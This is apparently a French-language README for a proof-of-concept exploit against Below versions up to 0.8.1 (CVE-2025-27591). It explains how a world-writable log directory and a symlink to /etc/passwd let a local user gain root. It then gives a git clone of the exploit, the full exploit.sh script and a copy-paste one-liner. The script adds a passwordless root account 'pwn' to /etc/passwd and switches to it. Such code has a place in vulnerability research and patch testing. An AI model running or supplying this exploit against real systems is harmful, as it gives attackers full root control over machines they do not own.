
Below v0.8.1 - Élévation de privilèges locaux (CVE-2025-27591) - Exploit PoC
Below <= v0.8.1
Escalade de privilèges locale via un lien symbolique de journal modifiable en écriture mondiale
Exploit PoC
Les versions de Below <= 0.8.1 contiennent une vulnérabilité critique d'escalade de privilèges locale (CVE-2025-27591).
En raison d'un répertoire de journaux mal configuré et accessible en écriture mondiale (/var/log/below/) et d'une logique de permissions inadéquate dans le code Rust, un attaquant local peut créer un lien symbolique error_<user>.log pointant vers n'importe quel fichier appartenant à root, comme /etc/passwd.
Lorsque below snapshot est exécuté avec sudo, il force le mode 0666 sur le fichier journal et y écrit, même s'il s'agit d'un lien symbolique.
Cela permet l'injection d'un utilisateur privilégié root sans mot de passe, menant à un accès complet à un shell root.
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
OU
Code de l'exploit
# Title : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage : usage: ./exploit.sh
u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry to /etc/passwd (now writable)
su pwn
Remarque : exploit.sh a été ajouté au README.md après qu'IppSec a utilisé la commande unique au lieu de exploit.sh dans son tutoriel. J'ai pensé que ce serait plus simple pour tout le monde. Merci IppSec. ^^
OU
Commande unique - (Copiez, collez et exécutez)
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
sudo avec accès NOPASSWD à /usr/bin/below *Découverte et signalée par Matthias Gerstner @ SUSE - Avis de sécurité
Exploit PoC - Ravindu Wickramasinhge alias rvz